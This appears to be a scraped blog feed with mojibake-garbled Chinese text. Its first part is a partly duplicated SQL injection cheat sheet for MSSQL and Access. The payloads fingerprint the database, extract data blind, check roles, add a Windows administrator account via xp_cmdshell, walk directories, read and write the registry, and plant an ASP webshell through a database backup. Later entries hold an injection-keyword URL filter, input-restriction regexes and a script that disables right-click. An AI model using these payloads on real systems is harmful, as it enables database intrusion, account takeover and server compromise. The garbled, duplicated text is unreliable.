锘??xml version="1.0" encoding="utf-8" standalone="yes"?>
1.鍒ゆ柇鏄惁鏈夋敞鍏?and 1=1 ;and 1=2
2.鍒濇鍒ゆ柇鏄惁鏄痬ssql ;and user>0
3.娉ㄥ叆鍙傛暟鏄瓧絎?and [鏌ヨ鏉′歡] and ''='
4.鎼滅儲鏃舵病榪囨護鍙傛暟鐨?and [鏌ヨ鏉′歡] and '%25'='
5.鍒ゆ柇鏁版嵁搴撶郴緇?
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.鐚滄暟鎹簱 ;and (select Count(*) from [鏁版嵁搴撳悕])>0
7.鐚滃瓧孌?;and (select Count(瀛楁鍚? from 鏁版嵁搴撳悕)>0 1.鍒ゆ柇鏄惁鏈夋敞鍏?and 1=1 ;and 1=2
2.鍒濇鍒ゆ柇鏄惁鏄痬ssql ;and user>0
3.娉ㄥ叆鍙傛暟鏄瓧絎?and [鏌ヨ鏉′歡] and ''='
4.鎼滅儲鏃舵病榪囨護鍙傛暟鐨?and [鏌ヨ鏉′歡] and '%25'='
5.鍒ゆ柇鏁版嵁搴撶郴緇?
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.鐚滄暟鎹簱 ;and (select Count(*) from [鏁版嵁搴撳悕])>0
7.鐚滃瓧孌?;and (select Count(瀛楁鍚? from 鏁版嵁搴撳悕)>0
8.鐚滃瓧孌典腑璁板綍闀垮害 ;and (select top 1 len(瀛楁鍚? from 鏁版嵁搴撳悕)>0
9.(1)鐚滃瓧孌電殑ascii鍊鹼紙access錛?
;and (select top 1 asc(mid(瀛楁鍚?1,1)) from 鏁版嵁搴撳悕)>0
(2)鐚滃瓧孌電殑ascii鍊鹼紙mssql錛?
;and (select top 1 unicode(substring(瀛楁鍚?1,1)) from 鏁版嵁搴撳悕)>0
10.嫻嬭瘯鏉冮檺緇撴瀯錛坢ssql錛?
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.娣誨姞mssql鍜岀郴緇熺殑甯愭埛
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)閬嶅巻鐩綍
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('涓婃寰楀埌鐨刾aths'))>)
(2)閬嶅巻鐩綍
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 鑾峰緱褰撳墠鎵鏈夐┍鍔ㄥ櫒
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 鑾峰緱瀛愮洰褰曞垪琛?
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 鑾峰緱鎵鏈夊瓙鐩綍鐨勭洰褰曟爲鏋?
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 鏌ョ湅鏂囦歡鐨勫唴瀹?
13.mssql涓殑瀛樺偍榪囩▼
xp_regenumvalues 娉ㄥ唽琛ㄦ牴閿? 瀛愰敭
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 浠ュ涓褰曢泦鏂瑰紡榪斿洖鎵鏈夐敭鍊?
xp_regread 鏍歸敭,瀛愰敭,閿煎悕
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 榪斿洖鍒跺畾閿殑鍊?
xp_regwrite 鏍歸敭,瀛愰敭, 鍊煎悕, 鍊肩被鍨? 鍊?
鍊肩被鍨嬫湁2縐峈EG_SZ 琛ㄧず瀛楃鍨?REG_DWORD 琛ㄧず鏁村瀷
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 鍐欏叆娉ㄥ唽琛?
xp_regdeletevalue 鏍歸敭,瀛愰敭,鍊煎悕
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 鍒犻櫎鏌愪釜鍊?
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 鍒犻櫎閿?鍖呮嫭璇ラ敭涓嬫墍鏈夊?
14.mssql鐨刡ackup鍒涘緩webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15.mssql鍐呯疆鍑芥暟
;and (select @@version)>0 鑾峰緱Windows鐨勭増鏈彿
;and user_name()='dbo' 鍒ゆ柇褰撳墠緋葷粺鐨勮繛鎺ョ敤鎴鋒槸涓嶆槸sa
;and (select user_name())>0 鐖嗗綋鍓嶇郴緇熺殑榪炴帴鐢ㄦ埛
;and (select db_name())>0 寰楀埌褰撳墠榪炴帴鐨勬暟鎹簱
]]>
<script language="javascript">
<!--
var url = location.search;
var re=/^\?(.*)(select%20|insert%20|delete%20from%20|count\(|drop%20table|update%20truncate%20|asc\(|mid\(|char\(|xp_cmdshell|exec%20master|net%20localgroup%20administrators|\"|:|net%20user|\|%20or%20)(.*)$/gi;
var e = re.test(url);
if(e) {
alert("鍦板潃涓惈鏈夐潪娉曞瓧絎︼綖");
location.href="error.asp";
}
//-->
<script>
]]>
鐢ㄦ鍒欒〃杈懼紡闄愬埗鍙兘杈撳叆涓枃錛歰nkeyup="value=value.replace(/[^\u4E00-\u9FA5]/g,'')" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\u4E00-\u9FA5]/g,''))"
鐢ㄦ鍒欒〃杈懼紡闄愬埗鍙兘杈撳叆鍏ㄨ瀛楃錛?onkeyup="value=value.replace(/[^\uFF00-\uFFFF]/g,'')" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\uFF00-\uFFFF]/g,''))"
鐢ㄦ鍒欒〃杈懼紡闄愬埗鍙兘杈撳叆鏁板瓧錛歰nkeyup="value=value.replace(/[^\d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))"
鐢ㄦ鍒欒〃杈懼紡闄愬埗鍙兘杈撳叆鏁板瓧鍜岃嫳鏂囷細onkeyup="value=value.replace(/[\W]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))"
鏀惰棌涓涓?br>濂戒笢瑗?
]]>
聽聽if(startlevel>=endlevel){
聽聽聽聽聽alert("緇撴潫綰у埆蹇呴』澶т簬寮濮嬬駭鍒紒");
聽聽聽聽 return false;
聽聽聽}
姣斿聽 startlevel=2錛宔ndlevel=15錛涘畠浼氳寰梥tartlevel>endlevel
鍙兘鏄疛S閲屾病鏈夋暟鎹被鍨嬬殑鍘熷洜錛屾墍浠ュ畠姣旂殑鏄?鍜?5涓殑1鍏堬紝灝辮涓?姣?5澶т簡銆傘?br />濡傛灉endlevel澶т簬20灝卞浜嗭紝
瑙e喅鍔炴硶灝辨槸濡傛灉鏄悇浣嶅氨鍦ㄥ墠闈㈠姞0錛屾瘮濡?鏀逛負02
]]>
瀹樼綉鎻愪緵涓嬭澆鐨勫帇緙╁寘閲屾湁鍑犱釜闈炲父涓嶉敊鐨勬ā鐗堜互鍙婂畨瑁呮枃浠訛紝瀹夎杞歡涔嬪悗绔嬪嵆榪愯錛屼細鍑虹幇涓涓猯oading杞歡鐣岄潰鐨勬彁紺猴紙java鍋氱殑錛燂紵錛燂級錛岀劧鍚庝綘灝變細鐪嬪埌涓涓縺鍔ㄤ漢蹇冪殑杞歡鍛堢幇鍦ㄤ綘鐨勯潰鍓嶏紝姣擠W濂藉お澶氫簡......
浣犲彲浠ュ湪榪欓噷鑷畾涔夎彍鍗曪紝鐒跺悗淇濆瓨鍒頒竴涓猦tml鏂囦歡閲岋紝鑿滃崟涓嶄粎婕備寒錛屾洿閲嶈鐨勬槸綰痗ss鐨勨滅豢鑹蹭唬鐮佲濆摝銆?br />
]]>
<script>
//紱佹ctrl+n鍜?紱佹ctrl+r鍜?紱佹shift+f10 紱佹榧犳爣鍙抽敭or宸﹀彸閿?鍜岀姝5
var oLastBtn=0,bIsMenu=false
if (window.Event)
{
document.captureEvents(Event.MOUSEUP);
}
function nocontextmenu()
{
event.cancelBubble=true;
event.returnValue=false;
return false;
}
function norightclick(e)
{
if(window.Event)
{
if (e.which !=1)
{
return false;
}
}
else
if(event.button!=1)
{
event.cancelBubble=true;
event.returnValue=false;
return false;
}
}
document.oncontextmenu=nocontextmenu;
document.onmousedown=norightclick;
function onKeyDown()
{
if ((event.altKey)||((event.keyCode==8)&&(event.srcElement.type!="text"&&event.srcElement.type!="textarea"&&event.srcElement.type!="password"))||((event.ctrlKey)&&((event.keyCode==78)||(event.keyCode==82)))||(event.keyCode==116))
{
event.keyCode=0;
event.returnValue=false;
}
}
</script>
<body onkeydown="onKeyDown()">